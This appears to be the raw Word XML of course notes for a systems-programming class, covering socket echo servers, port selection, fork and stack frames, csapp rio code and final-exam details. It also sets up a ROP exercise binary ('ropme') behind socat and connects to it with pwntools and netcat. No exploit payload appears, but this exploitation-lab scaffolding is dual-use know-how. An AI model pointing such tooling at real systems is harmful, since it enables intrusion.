          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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cd 10_network/netp  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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$ make clean &amp;&amp; make</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m12njfxu8eai" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to choose your port number 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Open port : 20</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:shd w:fill="fff2cc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~ 201</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:shd w:fill="fff2cc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">000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shd w:fill="fff2cc" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">123</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:shd w:fill="fff2cc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">456</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000546">
      <w:pPr>
        <w:rPr>
          <w:shd w:fill="ffe599" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">20</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:shd w:fill="ffe599" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">456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server$ ./echoserveri 20999</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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moon$ nc 122.38.251.9 20999</w:t>
            </w:r>
          </w:p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moon$ telnet 122.38.251.9 20999</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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io=remote("122.38.251.9", 31337 )</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/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PORT=20999 </w:t>
            </w:r>
          </w:p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EXEC_NAME=ropme</w:t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socat -v tcp-listen:$PORT,fork,reuseaddr EXEC:./$EXEC_NAME</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Style w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4oqq7fms653d" w:id="47"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2023.12.08 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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1od1cwpp73rq" w:id="48"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table7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nc 122.38.251.9 31337 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Local 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./ropme </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7r982da1u0xu" w:id="49"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wrap-up 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Some problems (or part of problems) are disclosed for your reference.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Style w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_f8ow2vifdtfx" w:id="50"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Struct 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486400"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="1270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/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Style w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bgzv3wj4tim0" w:id="51"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fork 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12700" l="12700" r="12700" t="127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Style w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2rfof1z5c2j2" w:id="52"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fork, signal 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 w="12700">
                      <a:solidFill>
                        <a:srgbClr val="D9D9D9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12700" l="12700" r="12700" t="1270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12700" l="12700" r="12700" t="1270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 w="12700">
                      <a:solidFill>
                        <a:srgbClr val="CCCC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Style w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h660ksfn7a0y" w:id="53"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack frame 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Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_emggkqahve25" w:id="54"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linking 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16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pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6ecgmg4cxeh9" w:id="55"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fork, thread 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278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pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_a2607t2x90ex" w:id="56"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Socket 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accept, bind, close, connect, listen, read, socket,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and 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write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pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_q8zl94hyg094" w:id="57"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Socket 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csapp.c</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table8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</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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 rio_readnb - Robustly read n bytes (buffered)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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*/</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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/* $begin rio_readnb */</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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ssize_t rio_readnb(rio_t *rp, void *usrbuf, size_t n)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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size_t nleft = n;</w:t>
            </w:r>
          </w:p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ssize_t nread;</w:t>
            </w:r>
          </w:p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char *bufp = usrbuf;</w:t>
            </w:r>
          </w:p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highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:highlight w:val="yellow"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> while (nleft &gt; 0) {</w:t>
            </w:r>
          </w:p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if ((nread = rio_read(rp, bufp, nleft)) &lt; 0)</w:t>
            </w:r>
          </w:p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    return -1;          /* errno set by read() */</w:t>
            </w:r>
          </w:p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else if (nread == 0)</w:t>
            </w:r>
          </w:p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    break;              /* EOF */</w:t>
            </w:r>
          </w:p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nleft -= nread;</w:t>
            </w:r>
          </w:p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bufp += nread;</w:t>
            </w:r>
          </w:p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return (n - nleft);         /* return &gt;= 0 */</w:t>
            </w:r>
          </w:p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5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Style w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rwn8fssmh0sk" w:id="58"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2023.12.22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005B0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_j9ura1jpketn" w:id="59"/>
      <w:bookmarkEnd w:id="59"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Final Exam Info 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573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7.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://askubuntu.com/questions/91815/how-to-install-software-or-upgrade-from-an-old-unsupported-release/91821#91821" TargetMode="External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mac.getutm.app/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Gallopsled/pwntools-tutorial" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23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hyperlink" Target="https://www.vmware.com/go/getfusionplayer" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://customerconnect.vmware.com/en/evalcenter?p=fusion-player-personal-13" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1-7Gg7U74g7XfIvddURAz2-OpJSvrno1l/view?usp=drive_link" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1-aIgnoCwsRGVD-Wiy95jqUTfPotAKRZQ/view?usp=drive_link" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pwndbg/pwndbg" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pwndbg/pwndbg" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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